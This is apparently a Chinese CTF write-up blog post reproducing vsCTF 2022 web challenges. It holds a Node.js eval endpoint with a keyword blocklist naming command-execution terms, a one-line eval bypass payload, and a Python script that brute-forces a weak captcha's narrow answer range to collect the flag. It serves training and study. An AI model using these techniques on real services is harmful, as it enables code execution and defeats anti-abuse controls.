[vsCTF2022]web题目复现

最新推荐文章于 2023-05-07 09:48:56 发布
最新推荐文章于 2023-05-07 09:48:56 发布
阅读量749 收藏
点赞数 3
分类专栏: 刷题记录 文章标签: 前端 javascript vue.js
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cosmoslin/article/details/125770208
版权

Baby Eval

const express = require('express');
const app = express();

function escape(s) {
    return `${s}`.replace(/./g,c => "&#" + c.charCodeAt(0) + ";");
}

function directory(keys) {
    const values = {
        "title": "View Source CTF",
        "description": "Powered by Node.js and Express.js",
        "flag": process.env.FLAG,
        "lyrics": "Good job, you’ve made it to the bottom of the mind control facility. Well done.",
        "createdAt": "1970-01-01T00:00:00.000Z",
        "lastUpdate": "2022-02-22T22:22:22.222Z",
        "source": require('fs').readFileSync(__filename),
    };

    return "<dl>" + keys.map(key => `<dt>${key}</dt><dd><pre>${escape(values[key])}</pre></dd>`).join("") + "</dl>";
}

app.get('/', (req, res) => {
    const payload = req.query.payload;

    if (payload && typeof payload === "string") {
        const matches = /([\.\(\)'"\[\]\{\}<>_$%\\xu^;=]|import|require|process|proto|constructor|app|express|req|res|env|process|fs|child|cat|spawn|fork|exec|file|return|this|toString)/gi.exec(payload);
        if (matches) {
            res.status(400).send(matches.map(i => `<code>${i}</code>`).join("<br>"));
        } else {
            res.send(`${eval(payload)}`);
        }
    } else {
        res.send(directory(["title", "description", "lastUpdate", "source"]));
    }
});

app.listen(process.env.PORT, () => {
    console.log(`Server started on http://127.0.0.1:${process.env.PORT}`);
});

nodejs的eval命令执行,过滤了很多,利用

?payload=directory`flag`

vsCAPTCHA

进入页面需要我们输入验证码

image-20220713002134009

根据图示:我们需要在每一轮也就是10s内正确输入验证码,总共输入正确1000次,验证码结果为两数相加

抓包发现x-captcha-state字段,是一段jwt,解码看一下

image-20220713002652392

猜测字段含义:

  • exp:表示令牌不再有效的时间戳
  • jti : 唯一标识符,用于区分我们的token和其他token
  • failed:指示一步是否验证失败
  • numCaptchasSolved : 验证的步骤数

第一种思路是将令牌中numCaptchasSolved的值更改为 1000,然后发送它来欺骗服务器,使其认为已经验证了1000次。但是,JWT 是经过签名的,尝试之后发现现有方法都不行,因此必须找到另一种方法。

另一种思路是使用 OCR 来检索验证码的内容,但在如此有限的时间内,显得很繁琐且不一定成功。

我们需要另辟蹊径,仔细观察每次的验证码,似乎生成的数都是相近的,我们不妨查看一下它的生成逻辑。

代码结构:

├── __MACOSX
│   └── vsCAPTCHA
│       └── static
├── vsCAPTCHA
│   ├── Dockerfile
│   ├── generate.sh
│   ├── src
│   │   └── main.ts
│   └── static
│       └── index.html
└── vsCAPTCHA.rar

看到main.ts

import { createCaptcha } from "https://deno.land/x/captcha@v1.0.1/mods.ts";
import * as jose from "https://deno.land/x/jose@v4.8.3/index.ts";
import { Application, Router } from "https://deno.land/x/oak@v10.6.0/mod.ts";

const FLAG = Deno.env.get("FLAG") ?? "vsctf{REDACTED}";
const captchaSolutions = new Map();

interface CaptchaJWT {
  exp: number;
  jti: string;
  flag?: string;
  failed: boolean;
  numCaptchasSolved: number;
}

const jwtKey = await jose.importPKCS8(
  new TextDecoder().decode(await Deno.readFile("./jwtRS256.key")),
  "RS256"
);
const jwtPubKey = await jose.importSPKI(
  new TextDecoder().decode(await Deno.readFile("./jwtRS256.key.pub")),
  "RS256"
);

const app = new Application();
const router = new Router();

const b1 = Math.floor(Math.random() * 500);
const b2 = Math.floor(Math.random() * 500);

router.get("/", (ctx) => {
  return ctx.send({
    path: "index.html",
    root: "./static",
  });
});

router.post("/captcha", async (ctx) => {
  const stateJWT = ctx.request.headers.get("x-captcha-state");
  const body = await ctx.request.body({
    type: "json",
  }).value;
  const solution = body.solution;

  let jwtPayload: CaptchaJWT = {
    // 10 seconds to solve
    exp: Math.round(Date.now() / 1000) + 10,
    jti: crypto.randomUUID(),
    failed: false,
    numCaptchasSolved: 0,
  };

  if (stateJWT) {
    try {
      const { payload } = await jose.jwtVerify(stateJWT, jwtPubKey);
      jwtPayload.numCaptchasSolved = payload.numCaptchasSolved;

      if (
        !captchaSolutions.get(payload.jti) ||
        captchaSolutions.get(payload.jti) !== solution
      ) {
        const jwt = await new jose.SignJWT({
          failed: true,
          numCaptchasSolved: payload.numCaptchasSolved,
          exp: payload.exp,
        })
          .setProtectedHeader({ alg: "RS256" })
          .sign(jwtKey);

        ctx.response.headers.set("x-captcha-state", jwt);
        ctx.response.status = 401;
        return;
      }
    } catch {
      ctx.response.status = 400;
      return;
    }

    jwtPayload.numCaptchasSolved += 1;
  }

  const num1 = Math.floor(Math.random() * 7) + b1;
  const num2 = Math.floor(Math.random() * 3) + b2;

  const captcha = createCaptcha({
    width: 250,
    height: 150,
    // @ts-ignore provided options are merged with default options
    captcha: {
      text: `${num1} + ${num2}`,
    },
  });

  ctx.response.headers.set("content-type", "image/png");
  if (jwtPayload.numCaptchasSolved >= 1000) {
    jwtPayload.flag = FLAG;
  }
  ctx.response.headers.set(
    "x-captcha-state",
    await new jose.SignJWT(jwtPayload as unknown as jose.JWTPayload)
      .setProtectedHeader({ alg: "RS256" })
      .sign(jwtKey)
  );
  captchaSolutions.set(jwtPayload.jti, num1 + num2);
  ctx.response.status = 200;

  ctx.response.body = captcha.image;
});

app.use(router.routes());

await app.listen({ port: 8080 });

服务器初始化的时候会同时初始两个全局变量直到服务器关闭

const b1 = Math.floor(Math.random() * 500);
const b2 = Math.floor(Math.random() * 500);

Math.random() 生成一个介于 0 (包含)和 1 (不包括)之间的伪随机数

  • b1 的值介于 0 *(包括)*和 500 *(不包括)*之间
  • b2 的值介于 0 *(包括)*和 500 *(不包括)*之间

而生成验证码的逻辑

const num1 = Math.floor(Math.random() * 7) + b1;
const num2 = Math.floor(Math.random() * 3) + b2;

  const captcha = createCaptcha({
    width: 250,
    height: 150,
    // @ts-ignore provided options are merged with default options
    captcha: {
      text: `${num1} + ${num2}`,
    },
  });

这下很好理解了,验证码的范围:

  • num1=[b1,b1+1,b1+2,b1+3,b1+4,b1+5,b1+6,b1+7[
  • num2=[b2,b2+1,b2+2,b2+3[

那么多观察几次就会发现b1 = 154b2 = 425,并且这两个数字不会更改是全局变量

因此

num1的值将在以下范围内:[154,155,156,157,158,159,160]

num2的值将在以下范围内:[425,426,427]

验证码的范围:[579, 580, 581, 582, 583, 584, 585, 586, 587]

最终写一个脚本:

import sys
import json
import base64
import requests

url = "https://vscaptcha-twekqonvua-uc.a.run.app"

res = requests.post(f"{url}/captcha", data="{}")
x_captcha_state = res.headers["x-captcha-state"]
print(base64.b64decode(x_captcha_state.split(".")[1] + "==").decode())

while True:
    for ans in [579, 580, 581, 582, 583, 584, 585, 586, 587]: # [154, 155, 156, 157, 158, 159, 160] + [425, 426, 427]
        res = requests.post(f"{url}/captcha", data=f"{{\"solution\": {ans}}}", headers={"x-captcha-state": x_captcha_state})
        if len(res.content) == 0: # Speed up!!
            continue
        try:
            state = base64.b64decode(res.headers["x-captcha-state"].split(".")[1] + "==").decode()
        except:
            print(res.headers["x-captcha-state"]) # Padding error?
        json_state = json.loads(state)
        print(state)
        if json_state["failed"] == False:
            if json_state["numCaptchasSolved"] >= 1000:
                print(f"Flag: {json_state['flag']}")
                sys.exit()
            x_captcha_state = res.headers["x-captcha-state"]
            break

这里远程环境有问题,我本地起了一个来跑

image-20220713012831399

Baby Wasm

web汇编,以后补上

Snakin_ya
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
MRCTF web部分复现wp
xlcvv的博客
04-05 694
一、ez_bypass 换个界面- 这个有点丑: GET两个参数:gg 和 id,md5值相同但本值不同,md5碰撞,之前有做过:,但是试了一些值都不行? 那就传入的为数组,md5()函数无法处理数组,如果传入数组,会返回NULL,所以两个数组经过加密后得到的都是NULL,也就是相等的。 显示出了You got the first steponly one way to get the fl...
XYCTF部分web题目复现
最新发布
05-06
XYCTF部分web题目复现
ctf web复现
m0_64815693的博客
05-07 732
ctf web复现
b01lers CTF web 复现
shinygod的博客
03-21 801
这题考的是 `xss` 中的表单劫持,和一点点 `csp` 的绕过。 在页面中可以看到 `default-src 'none';` 以及一些其他的限制,可以用 `meta` 标签来进行 `url` 重定向。 例如:这里面的 1 是延迟 1 秒后跳转。
SECCON CTF 2022 web复现
shinygod的博客
11-20 771
SECCON CTF 2022 web复现
[MRCTF 2022]web题目复现
cosmoslin的博客
04-27 1516
WEB webcheckin 一个文件上传点,可以上传webshell但是有检测,这里用二进制绕过 <?php class KUYE{ public $DAXW = null; public $LRXV = null; function __construct(){ $this->DAXW = '1100101 1110110 1100001 1101100 101000 100100 1011111 1010000 10011
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
强网杯SQL题目复现php.zip
12-17
强网杯 强网杯SQL题目复现php.zip
24年云曦考核web复现(部分)
03-18
24年云曦考核web复现(部分)
2022ISCC下载题目附件.rar
04-18
没想到不知不觉一年时间就这样过去了,又到了一年一度的ISCC信息对抗大赛,不知道去年打比赛的小伙伴今年还能不能再碰到,期待与君再相见( •̀ ω •́ )y所以今天就把去年的题目复现一遍供师傅们参考 ...
CVE-2022-28525复现文档(巨详细,零基础复现
10-14
CVE-2022-28525 复现文档 本文档旨在详细介绍 CVE-2022-28525 的复现过程,涵盖了靶场的设置、用户名和密码的爆破、木马的上传、文件上传的修改、终端连接等多个方面,旨在帮助读者深入理解漏洞的原理和利用方法。 ...
CTF比赛题目复现源码+项目说明.zip
01-16
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。 3、本资源作为“参考资料...CTF比赛题目复现源码+项目说明.zip
论文复现-深度补全算法
03-10
1、传统深度不全算法复现 2、详细内容可见:https://blog.csdn.net/qq_43627520/article/details/123344654?spm=1001.2014.3001.5502 3、复现代码可直接运行、包含有测试用例、以及验证代码
VNCTF2022 web复现
Pysnow's Blog
04-07 2709
web 文章目录webGameV4.0gocalc0easyJ4va信息收集获取key反序列化newcalc0非预期PoC 1PoC 2预期解InterestingPHP解法一解法二 GameV4.0 前端小游戏题,直接想到查看js源代码 在data.js文件中搜索到了关键词flag,且后面附着着一个base64编码的字符串,解码试试 得到flag,再将其url解码一下就行 VNCTF{Welcome_to_VNCTF2022} gocalc0 go语言的ssti,传入{{.}}指向当前的类,类似于
[2022 ACTF]web题目复现
cosmoslin的博客
07-06 1581
查看dockerfile发现题目使用环境为goahead5.1.4,联想到p神对于该漏洞的复现记录,我们有两种方法解题:GoAhead环境变量注入复现踩坑记hack.c 编译 exp.py exp.py 简单看一下代码逻辑:server.js 整个题目通过websockets通信,当api为getflag时传入flagbot 这里发现admin登录没有任何限制,那么我们登录admin再传入getflag即可 原型链污染: xss: ToLeSion 考点: TLS-Poison 一篇文章带你读懂 TLS
CTFshow web入门——爆破
小元砸的博客
01-24 4631
web 21 一.涉及工具: burp suit burp suit 使用教程 二.解题思路: 1.随便输一个密码和用户名抓包一下 2.base64解密一下发现账号密码的形式为 账号:密码,根据题目提示我们用自定义迭代器爆破,使用方法参考:Custom iterator的使用 注:下面爆破用的字典是题目所提供的 3.爆破出结果 web 22 一.涉及知识点: 子域名爆破(此题不能爆破出来)在线子域名爆破 二.解题思路: 直接点开View Hint(提示)即可得到答案 web 23 一.涉及工具: p
[SCUCTF]2021 校赛 Web题目复现
cosmoslin的博客
04-08 1955
web 1 入门 查看headers 2 shell <?php if(isset($_GET['eval'])){ $eval = $_GET['eval']; if(!preg_match('/[0-9]|[a-z]|\^|\+|\||\$|\[|\]|\{|\}|\&|\-/i', $c)){ eval("$eval"); }else{ die("hacker??"); } }else{ highlight_file(__FILE__); } ?
CVE-2022-47412复现
07-28
很抱歉,但我无法提供关于CVE-2022-47412的信息。 #### 引用[.reference_title] - *1* *2* *3* [Windows CVE-2022-21907和CVE-2022-21970复现以及分析](https://blog.csdn.net/Lab0431/article/details/122942736)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Snakin_ya

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值